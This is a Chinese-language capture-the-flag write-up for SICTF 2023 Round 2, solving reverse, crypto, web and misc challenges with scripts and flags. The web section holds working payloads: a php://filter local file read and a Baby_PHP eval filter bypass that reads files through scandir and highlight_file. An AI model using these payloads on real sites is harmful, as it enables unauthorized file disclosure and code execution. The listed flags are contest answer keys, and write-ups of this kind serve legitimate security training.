SICTF2023 #Round 2 wp + 附件

附件 https://github.com/nyyyddddn/ctf/tree/main/Sictf2023 %23Round 2

Reverse

[签到]PYC

电脑上的pycdc出问题了，就找个在线的

https://www.lddgo.net/string/pyc-compile-decompile

print('SICTF{07e278e7-9d66-4d90-88fc-8bd61e490616}')

Myobject

rc4加解密，写个脚本

def rc4(key, plaintext):
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]  # Swap values
    i = 0
    j = 0
    output = []
    for byte in plaintext:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]  
        K = S[(S[i] + S[j]) % 256]
        output.append(byte ^ K)

    return output
key = [ord(char) for char in "SIFLAG"]
v18_bytes = (0x47CF225A0ED32730).to_bytes(8, byteorder='little')
ciphertext_v19 = [71, 107, 11, 229, 141, 83, 186, 153, 195, 133, 7]
v20_bytes = (0x9F88FE10771C0107).to_bytes(8, byteorder='little')

full_ciphertext_27 = list(v18_bytes) + ciphertext_v19 + list(v20_bytes)

decrypted_full_combined = rc4(key, full_ciphertext_27)
decrypted_full_combined_string = ''.join([chr(byte) for byte in decrypted_full_combined])
print(decrypted_full_combined_string)

SICTF{wow_you_get_the_flag}

chbase

strcpy(Str2, "F0lWEVA7BmUzAGB0C2UuAU9hbnIpATEidDdnACQ9");

char *sub_411B30()
{
  char *result; // eax

  __CheckForDebuggerJustMyCode(&unk_41C0F5);
  j_strcpy(&Destination, "ZYXWVUTSRQPONMLKJIHGFEDCBAabcdefghijklmnopqrstuvwxyz0123456789+/");
  result = (char *)IsDebuggerPresent();
  if ( result )
    return j_strcpy(&Destination, "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/");
  return result;
}

base64换一下上面的索引表就解出来了

http://web.chacuo.net/netbasex

SICTF{base64_and_antidebugger}

不一样的base64

这个出题人怎么对base64情有独钟

pyinstaller打包的exe,我找了几个提取pyc的项目，就这个比较好用

https://github.com/pyinstxtractor/pyinstxtractor-ng/releases/tag/2023.08.20

然后把111.pyc 反编译一下

https://www.lddgo.net/string/pyc-compile-decompile

# Visit https://www.lddgo.net/string/pyc-compile-decompile for more information
# Version : Python 3.8

BASE64_CHARS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

def base64_encode(data):
    binary_str = ''.join((lambda .0: for x in .0:
format(x, '08b'))(data))
    padding = len(binary_str) % 24
    if padding != 0:
        binary_str += '0' * (24 - padding)
    result = ''
    for i in range(0, len(binary_str), 6):
        group = binary_str[i:i + 6]
        decimal_val = int(group, 2)
        result += BASE64_CHARS[decimal_val]
    padding_count = (4 - len(result) % 4) % 4
    result += '=' * padding_count
    return result

data = input('').encode()
encoded_data = base64_encode(data)
print(encoded_data)
if encoded_data == 'U0lDVEZ7OGUwZDM1OGQtOGI5ZC00ODY2LTliMDItNjc0OWIwN2FkMDlhfQAA':
    print('True!')

这个是base64换表，用这个解密

http://web.chacuo.net/netbasex

SICTF{8e0d358d-8b9d-4866-9b02-6749b07ad09a}拿到flag

javacode

Crypto

[签到]古典大杂烩

emjoy编码，用这个解码http://www.atoolbox.net/Tool.php?Id=937

然后就不知道什么编码了，在搜索ctf编码识别的时候找到了这个项目

https://github.com/Ciphey/Ciphey 用这个项目解出了flag，这是docker版本的使用https://docs.remnux.org/run-tools-in-containers/remnux-containers#ciphey

SICTF{fe853b49-8730-462e-86f5-fc8e9789f077}

Radio

有三组n c，然后e比较小，用中国剩余定理求

import gmpy2
import binascii


# 利用中国剩余定理求解同余方程，aList：余数，mList：模数
def CRT(aList, mList):
    M = 1
    for i in mList:
        M = M * i  # 计算M = ∏ mi
    x = 0
    for i in range(len(mList)):
        Mi = M // mList[i]  # 计算Mi
        Mi_inverse = gmpy2.invert(Mi, mList[i])  # 计算Mi的逆元
        x += aList[i] * Mi * Mi_inverse  # 构造x各项
    x = x % M
    return x


if __name__ == "__main__":
    n1 = "14628911682936716611458501697007036859460044243525290515096052103585430459755335375005202100114469571371360084664887335211277585652711111523095037589648375630146039444071400098427638768750755153219974194380355807078158427824557754939604018020265955042573660474772006646525311705184431094905718137297923127124517126579859336516891364853724635334011666814712424599592662398013241607855160919361308195967978220182785816761656927836373944699635667244275310680450562446433724968942835275279255823144471582249379035668825437133182865600026935116686574740844588839352146024513673500770611055698030333734066230166111140083923"
    n2 = "16756694748293603983474688536179571665757862433174984877308316444468003022266277794769268134195205510197588585566270416339902269736376811449830775290335951504698137924773942880807921752691668522662285163130340474205633998154849689387759453003838730282756734975490180702422176361373516245372635401939755527017589503572550811648345570775428936487145892225736625411540461653083957762795820510109891180906709827194217045059033312564525916136573856999724346161896146703174418039344166251503310869772735585554127509732135494936119159784702673291794381095696332128950979288440758815310482211285712819274848744478643590996499"
    n3 = "12023158079717019193506148537498877243668782424904061914991928068483879707115315968983829360560644394409575645736275352836086080024994045582242629571839276759393418303915955798990522990081795218822313146157773272844272865701134880180795342597049645358985187689813369428579614193015028249821853347208001645148169449968882591709833452960545988520048722323580338213590245476892223967673180144525106292453573842357322398199104132677638909964034937501684668442732786408572501007756270725934445316827054687741612177409932320532825182104820899546084015733164816993674100635828218335112393003462442685677115798304835391938681"
    c1 = "786426913645332991929803636719878643130489430090701482974255190570111407517277263761161970232982615374753982050075781017755721714929721429185828101898786972242994012456972241276851428750970754773002966788642795040933520662931514953660571657013642671173456750800960592586345219252277575624120271330470724245201080094330964145796872211627254805407394764183615099525852600855622089361965086460279057625205099471122036599934609091062009161119885692567925924978687256063116915630947838112126347748759078024890458539541208153526564434483654508834147071166870006117573542198238493913144419569943131642262575848786399020602"
    c2 = "14269311999815379511888097227418748728398011595172649708273598243317106830139061994801598925448165045032084910971094414749744701731066555194159863759072739031915833091715422787808666326235589236328864675164322734119047182014621724868200908222400504845559290620275973427127376594365043386362821355037781568524903149101953873768462097165128186788759111090267131443645126715520994688945363059795513931799317608292977574376954729552861360597103229877031117089231816770880909815561950691603994439997197261395452797893557057320175747162837857668062550646101714062365530246698404923128445182100334335447738834779014705114350"
    c3 = "3204718091370324153305164801961074660508922478706979436653573192321723216725523523538914956544950802616295043619768261075799875855502834749045520466140056621489305006966280527055668378303630674311102581232313032585389907028715671091914904062961720585667564982641321454541632782484415075257140508738041786400512095949826279576159569786734978545737717138115729502475357594151593143140355121154223614868465202149338507796306863351134218879326031985027900678671697876083351974546516576983143592764763925335805465720148057651958521255276602933604064541840892578409973858867533575728482926007556060584654853884046046420855"

    cList = [int(c1), int(c2), int(c3)]
    nList = [int(n1), int(n2), int(n3)]
    m_e = CRT(cList, nList)
    for e in range(17,18):
        m, f = gmpy2.iroot(m_e, e)
        m = hex(m)[2:]
        if len(m) % 2 == 1:
            m = m + '0'
        flag = binascii.unhexlify(m)
        print(flag)

SICTF{fdc0afb5-1c81-46b9-a28a-241f5f64419d}

small_e

from sympy import symbols, Eq, solve


n = 23407088262641313744603678186127228163189328033499381357614318160776774708961658114505773173784501557046914457908828086210961235530240151825359345210845219656000760996670856300710703016947799649686427460688236465568188205550456293373157997725204643414082796492333552579250010906010553831060540937802882205118399938918764313169385349293602085310111289583058965780887097301702677087443291977479125263301000328313103296364864396361278863921717374909215078711198899810620522933994481419395021233240234478331179727351050575360886334237633420906629984625441302945112631166021776379103081857393866576659121443879590011160797

e = 3
c = 1584727211980974717747362694412040878682966138197627512650829607105625096823456063149392973232737929737200028676411430124019573130595696272668927725536797627059576270068695792221537212669276826952363636924278717182163166234322320044764324434683614360641636360301452618063418349310497430566465329766916213742181
m1 = 11658736990073967239197168945911788935424691658202162501032766529463315401599017877851823976178979438592

c1 = pow(m1, e, n)

delta_m_symbol = symbols('delta_m')
polynomial_equation = Eq(c, (m1 + delta_m_symbol)**3)
solutions = solve(polynomial_equation, delta_m_symbol)
m_recovered = m1 + solutions[0]

print(bytes.fromhex(hex(m_recovered)[2:]).decode())

SICTF{2ca8e589-4a31-4909-80f0-9ecfc8f8cb37}

Web

[签到]Include

http://210.44.151.51:10120/?SICTF=php://filter/read=convert.base64-encode/resource=flag.php 读到下面内容

<?php
$file_path = "/flag";
if (file_exists($file_path)) {
    $flag = file_get_contents($file_path);
}
else{
    echo "error";
}

访问flag.php没有error，所以用伪协议读/flag 拿到flag

http://210.44.151.51:10120/?SICTF=php://filter/read=convert.base64-encode/resource=/flag

base64解码SICTF{f9bcd5bf-2e28-404c-936c-92d7f0ba2158}

Baby_PHP

highlight_file(__FILE__);
error_reporting(0);

$query = $_SERVER['QUERY_STRING'];

if (preg_match('/_|%5f|\.|%2E/i', $query)) {
    die('You are Hacker!');
}
if($_GET['k_e_y'] !=='123' && preg_match('/^123$/',$_GET['k_e_y'])){
    echo("You are will Win!<br>");
    if(isset($_POST['command'])){
        $command = $_POST['command'];
        if(!preg_match("/\~|\`|\@|\#|\\$|\%|\&|\*|\（|\）|\-|\+|\=|\{|\}|\[|\]|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i",$command)){
            eval($command);
        }
        else{
            echo("You are Hacker!");
        }
    }
}
else{
    echo("K_e_y is Errors!");
}

这里第一个preg是可以用url编码代替下划线，然后第二个preg

$_GET[key]是强比较加后面的preg_match，搜了好久发现可以用换行符%0A绕过这个k%20e%20y=123%0A

command中preg那个这个圆括号是中文的圆括号，也就是说可以用函数，我一开始想着是system()然后去网上找些shell中的一些奇怪的技巧去绕过，然后发现关键的字符基本上都给过滤了，后面想了一下能用函数，那是不是可以用函数来替代原本该用shell操作的动作

在这篇文章里面找到了结果https://blog.csdn.net/qq_38154820/article/details/107171940?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522161461040516780255236081%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=161461040516780255236081&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2_allbaidu_landing_v2~default-1-107171940.pc_search_result_no_baidu_js&utm_term=%E6%97%A0%E5%8F%82%E6%95%B0%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96

最后的payload是

?k%20e%20y=123%0A
command=highlight_file(next(array_reverse(scandir(current(localeconv())))));

MISC

fast_morse

摩斯密码

..-. ..--- .- ----- ----. -... ..-. -....- --... ..-. ....- .- -....- ....- ..--- -.... ----. -....- ----. ...-- .- ..... -....- -.-. ---.. .- ....- ---.. ...-- -.... ----- -... ----- ...-- -.-.

SICTF{f2a09bf-7f4a-4269-93a5-c8a48360b03c}